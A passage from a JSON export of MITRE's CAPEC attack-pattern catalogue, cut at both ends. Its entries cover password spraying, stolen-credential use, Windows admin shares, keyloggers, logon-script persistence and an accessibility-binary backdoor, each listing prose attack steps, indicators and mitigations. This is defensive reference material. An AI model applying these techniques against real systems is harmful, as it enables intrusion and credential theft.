handler for a given file extension to call an arbitrary program when a file with the given extension is opened.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Inspect registry for changes. Limit privileges of user accounts so changes to default file handlers can only be performed by authorized administrators."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1546.001","Entry_Name":"Event Triggered Execution:Change Default File Association"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"558":{"ID":"558","Name":"Replace Trusted Executable","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits weaknesses in privilege management or access control to replace a trusted executable with a malicious version and enable the execution of malware when that trusted executable is called.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Example_Instances":{"Example":"Specific versions of Windows contain accessibility features that may be launched with a key combination before a user has logged in (for example when they are on the Windows Logon screen). On Windows XP and Windows Server 2003/R2, the program (e.g. \\"C:\\\\Windows\\\\System32\\\\utilman.exe\\") may be replaced with cmd.exe (or another program that provides backdoor access). Then pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over RDP will cause the replaced file to be executed with SYSTEM privileges."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1546.008","Entry_Name":"Event Triggered Execution:Accessibility Features"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, References, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"559":{"ID":"559","Name":"Orbital Jamming","Abstraction":"Detailed","Status":"Draft","Description":"In this attack pattern, the adversary sends disruptive signals at a target satellite using a rogue uplink station to disrupt the intended transmission. Those within the satellite\'s footprint are prevented from reaching the satellite\'s targeted or neighboring channels. The satellite\'s footprint size depends upon its position in the sky; higher orbital satellites cover multiple continents.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"601"}},"Prerequisites":{"Prerequisite":"This attack requires the knowledge of the satellite\'s coordinates for targeting."},"Resources_Required":{"Resource":"A satellite uplink station."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"A successful attack will deny the availability of the satellite communications for authorized users."}},"References":{"Reference":{"External_Reference_ID":"REF-462"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"}}},"560":{"ID":"560","Name":"Use of Known Domain Credentials","Abstraction":"Meta","Status":"Stable","Description":{"p":["An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service. Attacks leveraging trusted credentials typically result in the adversary laterally moving within the local network, since users are often allowed to login to systems/applications within the network using the same password. This further allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.","Attacks on known passwords generally rely on the primary fact that users often reuse the same username/password combination for a variety of systems, applications, and services, coupled with poor password policies on the target system or application. Adversaries can also utilize known passwords to target Single Sign On (SSO) or cloud-based applications and services, which often don\'t verify the authenticity of the user\'s input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data.","Successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"CanPrecede","CAPEC_ID":"151"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known credentials] The adversary must obtain known credentials in order to access the target system, application, or service.","Technique":["An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.","An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.","An adversary conducts a sniffing attack to steal credentials as they are transmitted.","An adversary gains access to a database and exfiltrates password hashes.","An adversary examines outward-facing configuration and properties files to discover hardcoded credentials."]},{"Step":"2","Phase":"Explore","Description":"[Determine target\'s password policy] Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account)."]},{"Step":"3","Phase":"Experiment","Description":"[Attempt authentication] Try each credential until the target grants access.","Technique":"Manually or automatically enter each credential through the target\'s interface."},{"Step":"4","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within a system or application"},{"Step":"5","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into a victim user\'s system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks."},{"Step":"6","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within the system or application."}]},"Prerequisites":{"Prerequisite":["The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.","The system/application does not have a sound password policy that is being enforced.","The system/application does not implement an effective password throttling mechanism.","The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target."]},"Skills_Required":{"Skill":["Once an adversary obtains a known credential, leveraging it is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":["A list of known credentials.","A custom script that leverages the credential list to launch an attack."]},"Indicators":{"Indicator":["Authentication attempts use credentials that have been used previously by the account in question.","Authentication attempts are originating from IP addresses or locations that are inconsistent with the user\'s normal IP addresses or locations.","Data is being transferred and/or removed from systems/applications within the network.","Suspicious or Malicious software is downloaded/installed on systems within the domain.","Messages from a legitimate user appear to contain suspicious links or communications not consistent with the user\'s normal behavior."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.","Create a strong password policy and ensure that your system enforces this policy.","Ensure users are not reusing username/password combinations for multiple systems, applications, or services.","Do not reuse local administrator account credentials across systems.","Deny remote use of local admin credentials to log into domain systems.","Do not allow accounts to be a local administrator on more than one system.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Monitor system and domain logs for abnormal credential access."]},"Example_Instances":{"Example":["Throughout 2015 and 2016, APT28 \u2014 also known as Pawn Storm, Sednit, Fancy Bear, Sofacy, and STRONTIUM \u2014 leveraged stolen credentials to infiltrate the Democratic National Committee (DNC), the United States Army, the World Anti-Doping Agency (WADA), the Court of Arbitration for Sport (TAS-CAS), and more. In most cases, the legitimate credentials were obtained via calculated spearphishing, tabnabbing, and DNS attacks targeted at corporate webmail systems. APT28 also executed several watering hole attacks, in addition to exploiting several zero-day vulnerabilities within Flash and Windows. The stolen credentials were then utilized to maintain authenticated access, laterally move within the local network, and exfiltrate sensitive information including DNC emails and personal medical records of numerous athletes. [REF-571]","In early 2019, FIN6 exploited stolen credentials from an organization within the engineering industry to laterally move within an environment via the Windows\u2019 Remote Desktop Protocol (RDP). Multiple servers were subsequently infected with malware to create malware distribution servers, which were used to distribute the LockerGoga ransomware. [REF-573]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"1273"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1078.001","Entry_Name":"Valid Accounts:Default Accounts"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1078.002","Entry_Name":"Valid Accounts:Domain Accounts"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1078.003","Entry_Name":"Valid Accounts:Local Accounts"}]},"References":{"Reference":[{"External_Reference_ID":"REF-570"},{"External_Reference_ID":"REF-571"},{"External_Reference_ID":"REF-572"},{"External_Reference_ID":"REF-573"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Abstraction, @Status, Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required, Taxonomy_Mappings, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"561":{"ID":"561","Name":"Windows Admin Shares with Stolen Credentials","Abstraction":"Detailed","Status":"Draft","Description":"An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows administrator credentials (e.g. userID/password) to access Windows Admin Shares on a local machine or within a Windows domain. Windows systems within the Windows NT family contain hidden network shares that are only accessible to system administrators. These shares allow administrators to remotely access all disk volumes on a network-connected system and further allow for files to be copied, written, and executed, along with other administrative actions. Example network shares include: C$, ADMIN$ and IPC$. If an adversary is able to obtain legitimate Windows credentials, the hidden shares can be accessed remotely, via server message block (SMB) or the Net utility, to transfer files and execute code. It is also possible for adversaries to utilize NTLM hashes to access administrator shares on systems with certain configuration and patch levels.","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"653"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"165"},{"Nature":"CanPrecede","CAPEC_ID":"549"},{"Nature":"CanPrecede","CAPEC_ID":"545"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known Windows administrator credentials] The adversary must obtain known Windows administrator credentials in order to access the administrative network shares.","Technique":["An adversary purchases breached Windows administrator credentials from the dark web.","An adversary leverages a key logger or phishing attack to steal administrator credentials as they are provided.","An adversary conducts a sniffing attack to steal Windows administrator credentials as they are transmitted.","An adversary gains access to a Windows domain system/files and exfiltrates Windows administrator password hashes.","An adversary examines outward-facing configuration and properties files to discover hardcoded Windows administrator credentials."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt domain authentication] Try each Windows administrator credential against the hidden network shares until the target grants access.","Technique":"Manually or automatically enter each administrator credential through the target\'s interface."},{"Step":"3","Phase":"Exploit","Description":"[Malware Execution] An adversary can remotely execute malware within the administrative network shares to infect other systems within the domain."},{"Step":"4","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can remotely obtain sensitive data contained within the administrative network shares."}]},"Prerequisites":{"Prerequisite":["The system/application is connected to the Windows domain.","The target administrative share allows remote use of local admin credentials to log into domain systems.","The adversary possesses a list of known Windows administrator credentials that exist on the target domain."]},"Skills_Required":{"Skill":["Once an adversary obtains a known Windows credential, leveraging it is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A list of known Windows administrator credentials for the targeted domain."},"Indicators":{"Indicator":["Data is being transferred and/or removed from administrative network shares.","Suspicious or Malicious software is executed within administrative network shares.","Suspicious or Malicious software is downloaded/installed on systems within the domain."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Do not reuse local administrator account credentials across systems.","Deny remote use of local admin credentials to log into domain systems.","Do not allow accounts to be a local administrator on more than one system."]},"Example_Instances":{"Example":["APT32 has leveraged Windows\' built-in Net utility to use Windows Administrative Shares to copy and execute remote malware. [REF-579]","In May 2017, APT15 laterally moved within a Windows domain via Windows Administrative Shares to copy files to and from compromised host systems. This further allowed for the remote execution of malware. [REF-578]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"294"},{"CWE_ID":"263"},{"CWE_ID":"262"},{"CWE_ID":"521"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1021.002","Entry_Name":"Remote Services:SMB/Windows Admin Shares"}},"References":{"Reference":[{"External_Reference_ID":"REF-577"},{"External_Reference_ID":"REF-578"},{"External_Reference_ID":"REF-579"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Example_Instances, Execution_Flow, Indicators, Mitigations, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"562":{"ID":"562","Name":"Modify Shared File","Abstraction":"Detailed","Status":"Draft","Description":"An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Mitigations":{"Mitigation":"Disallow shared content. Protect shared folders by minimizing users that have write access. Use utilities that mitigate exploitation like the Microsoft Enhanced Mitigation Experience Toolkit (EMET) to prevent exploits from being run."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1080","Entry_Name":"Taint shared content"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"563":{"ID":"563","Name":"Add Malicious File to Shared Webroot","Abstraction":"Detailed","Status":"Draft","Description":"An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Mitigations":{"Mitigation":"Ensure proper permissions on directories that are accessible through a web server. Disallow remote access to the web root. Disable execution on directories within the web root. Ensure that permissions of the web server process are only what is required by not using built-in accounts and instead create specific accounts to limit unnecessary access or permissions overlap across multiple systems."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"564":{"ID":"564","Name":"Run Software at Logon","Abstraction":"Detailed","Status":"Draft","Description":"Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Restrict write access to logon scripts to necessary administrators."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1037","Entry_Name":"Boot or Logon Initialization Scripts"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.001","Entry_Name":"Create or Modify System Process:Launch Agent"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1547","Entry_Name":"Boot or Logon Autostart Execution"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"565":{"ID":"565","Name":"Password Spraying","Abstraction":"Detailed","Status":"Draft","Description":{"p":["In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target\'s complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout. Password Spraying attacks often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. Successful execution of Password Spraying attacks usually lead to lateral movement within the target, which allows the adversary to impersonate the victim or execute any action that the victim is authorized to perform. If the password chosen by the user is commonly used or easily guessed, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.","Password Spraying Attacks are similar to Dictionary-based Password Attacks (CAPEC-16) in that they both leverage precompiled lists (i.e. dictionaries) of username/password combinations to try against a system/application. The primary difference is that Password Spraying Attacks leverage a known list of user accounts and only try one password for each account before moving onto the next password. In contrast, Dictionary-based Password Attacks leverage unknown username/password combinations and are often executed offline against files containing hashed credentials, where inducing an account lockout is not a concern.","Password Spraying Attacks are also similar to Credential Stuffing attacks (CAPEC-600), since both utilize known user accounts and often attack the same targets. Credential Stuffing attacks, however, leverage known username/password combinations, whereas Password Spraying attacks have no insight into known username/password pairs. If a Password Spraying attack succeeds, it may additionally lead to Credential Stuffing attacks on different targets."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"49"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target\'s password policy] Determine the password policies of the target system/application.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks)."]},{"Step":"2","Phase":"Explore","Description":"[Select passwords] Pick the passwords to be used in the attack (e.g. commonly used passwords, passwords tailored to individual users, etc.)","Technique":["Select passwords based on common use or a particular user\'s additional details.","Select passwords based on the target\'s password complexity policies."]},{"Step":"3","Phase":"Exploit","Description":"[Brute force password] Given the finite space of possible passwords dictated by information determined in the previous steps, try each password for all known user accounts until the target grants access.","Technique":["Manually or automatically enter the first password for each known user account through the target\'s interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.","Iterate through the remaining passwords for each known user account."]}]},"Prerequisites":{"Prerequisite":["The system/application uses one factor password based authentication.","The system/application does not have a sound password policy that is being enforced.","The system/application does not implement an effective password throttling mechanism.","The adversary possesses a list of known user accounts on the target system/application."]},"Skills_Required":{"Skill":["A Password Spraying attack is very straightforward. A variety of password cracking tools are widely available.",{"Level":"Low"}]},"Resources_Required":{"Resource":["A machine with sufficient resources for the job (e.g. CPU, RAM, HD).","Applicable password lists.","A password cracking tool or a custom script that leverages the password list to launch the attack."]},"Indicators":{"Indicator":["Many invalid login attempts are coming from the same machine (same IP address) or for multiple user accounts within short succession.","The login attempts use passwords that have been used previously by the user account in question.","Login attempts are originating from IP addresses or locations that are inconsistent with the user\'s normal IP addresses or locations."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Create a strong password policy and ensure that your system enforces this policy.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network."]},"Example_Instances":{"Example":["A user selects the phrase \\"Password123\\" as their password, believing that it would be very difficult to guess. Password Spraying, leveraging a list of commonly used passwords, is used to crack this password and gain access to the account.","The Iranian hacker group APT33 (AKA Holmium, Refined Kitten, or Elfin) carried out numerous Password Spraying attacks in 2019. On average, APT33 targeted 2,000 organizations per month, with upwards of 10 million authentication attempts each day. The majority of these attacks targeted manufacturers, suppliers, or maintainers of industrial control system equipment."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1110.003","Entry_Name":"Brute Force:Password Spraying"}},"References":{"Reference":[{"External_Reference_ID":"REF-565"},{"External_Reference_ID":"REF-566"},{"External_Reference_ID":"REF-567"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}}},"568":{"ID":"568","Name":"Capture Credentials via Keylogger","Abstraction":"Detailed","Status":"Draft","Description":"An adversary deploys a keylogger in an effort to obtain credentials directly from a system\'s user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"569"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine which user\'s credentials to capture] Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of."},{"Step":"2","Phase":"Experiment","Description":"[Deploy keylogger] Once a user is identified, an adversary will deploy a keylogger to the user\'s system in one of many ways.","Technique":["Send a phishing email with a malicious attachment that installs a keylogger on a user\'s system","Conceal a keylogger behind fake software and get the user to download the software","Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge","Gain access to the user\'s system through a vulnerability and manually install a keylogger"]},{"Step":"3","Phase":"Experiment","Description":"[Record keystrokes] Once the keylogger is deployed on the user\'s system, the adversary will record keystrokes over a period of time."},{"Step":"4","Phase":"Experiment","Description":"[Analyze data and determine credentials] Using the captured keystrokes, the adversary will be able to determine the credentials of the user.","Technique":["Search for repeated sequences that are following by the enter key","Search for repeated sequences that are not found in a dictionary","Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence"]},{"Step":"5","Phase":"Exploit","Description":"[Use found credentials] After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack"}]},"Prerequisites":{"Prerequisite":"The ability to install the keylogger, either in person or remote."},"Mitigations":{"Mitigation":"Strong physical security can help reduce the ability of an adversary to install a keylogger."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1056.001","Entry_Name":"Input Capture:Keylogging"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"569":{"ID":"569","Name":"Collect Data as Provided by Users","Abstraction":"Standard","Status":"Draft","Description":"An attacker leverages a tool, device, or program to obtain specific information as provided by a user of the target system. This information is often needed by the attacker to launch a follow-on attack. This attack is different than Social Engineering as the adversary is not tricking or deceiving the user. Instead the adversary is putting a mechanism in place that captures the information that a user legitimately enters into a system. Deploying a keylogger, performing a UAC prompt, or wrapping the Windows default credential provider are all examples of such interactions.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"116","Exclude_Related":[{"Exclude_ID":"437"},{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1056","Entry_Name":"Input Capture"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"571":{"ID":"571","Name":"Block Logging to Central Repository","Abstraction":"Standard","Status":"Draft","Description":"An adversary may attempt to block indicators from leaving the host machine. In the case of network based reporting of indicators, an adversary may block traffic associated with reporting to prevent central station analysis. This may be accomplished by many means such as stopping a local process to creating a host-based firewall rule to block traffic to a specific server.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"161","Exclude_Related":{"Exclude_ID":"515"}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1562.006","Entry_Name":"Impair Defenses:Indicator Blocking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content 